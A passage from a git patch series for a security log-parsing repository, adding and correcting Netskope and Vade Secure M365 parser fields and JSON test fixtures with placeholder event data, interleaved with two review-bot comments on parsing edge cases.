ype\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "block", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + 
"postal_code": "75018", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "test.example.com", + "path": "test.example.com" + }, + "user": { + "domain": "mail.fr", + "email": "john.doe@mail.fr", + "name": "john.doe" + }, + "user_agent": { + "name": "Chrome" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index 25513a172..d0d9ed304 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -43,7 +43,8 @@ "md5": "68b329da9893e34099c7d8ad5cb9c940" }, "mime_type": "image/gif", - "name": "giphy2.gif" + "name": "giphy2.gif", + "size": 204299 }, "host": { "name": "TEST-1111111", diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json new file mode 100644 index 000000000..b05f61a9d --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json 
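Review bot: The expected output for this block event sets `url.path` to `test.example.com` with no `url.domain`, i.e. the scheme-less `url` value is being classified as a path; the fixture pins that, so rules matching on `url.domain` would miss this DoH block. It looks like a parser-side URL grammar issue rather than something wrong in the fixture, but the test should then expect `"domain": "test.example.com"` once that is fixed. Also note the input's `userip` (`10.20.30.40`) and `device_classification: "unmanaged"` are not reflected anywhere in the expected output, and `related.ip` lists only `1.2.3.4` and `5.6.7.8`; if that is intentional it is worth a comment in the parser, since the client IP of a blocked DoH attempt is the field an analyst pivots on.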
@@ -0,0 +1,120 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 
DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + 
"dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template
\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + 
"user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..4c435b860 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "Share", + "action": "useralert", "category": [ "network" ], From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:32:02 +0100 Subject: [PATCH 253/317] Improvement: Vade Secure M365 - Add parsed fields --- VadeSecure/vade_secure_m365/_meta/fields.yml | 5 ++ VadeSecure/vade_secure_m365/ingest/parser.yml | 5 ++ .../vade_secure_m365/tests/email_02.json | 61 +++++++++++++++ .../tests/email_with_attachment_02.json | 77 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..a3f60b15c 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,11 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details: + description: Details of security protocols, mostly SPF, DKIM and DMARC. + name: vadesecure.auth_results_details + type: object + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml 
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json 
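Review bot: The new `email.reply_to.address` filter only rejects the empty string; if `reply_to_header` is ever absent from the payload, `parse_json.message.reply_to_header` is undefined and `!= ''` still holds, so the field may be set to whatever the template engine renders for an undefined value (both new fixtures include the key, so this case is not covered). A guard in the spirit of the `sender_ip` action just above would be safer: `filter: "{{parse_json.message.get('reply_to_header') not in [None, '']}}"`. Worth noting for rule authors that a Reply-To on a different domain than From, as in `email_02.json` (`jd@doe.fr` vs `user@company.com`), is a common phishing signal, so this field is a good candidate for detection once it is populated reliably.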
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": 
\"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], 
\"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": 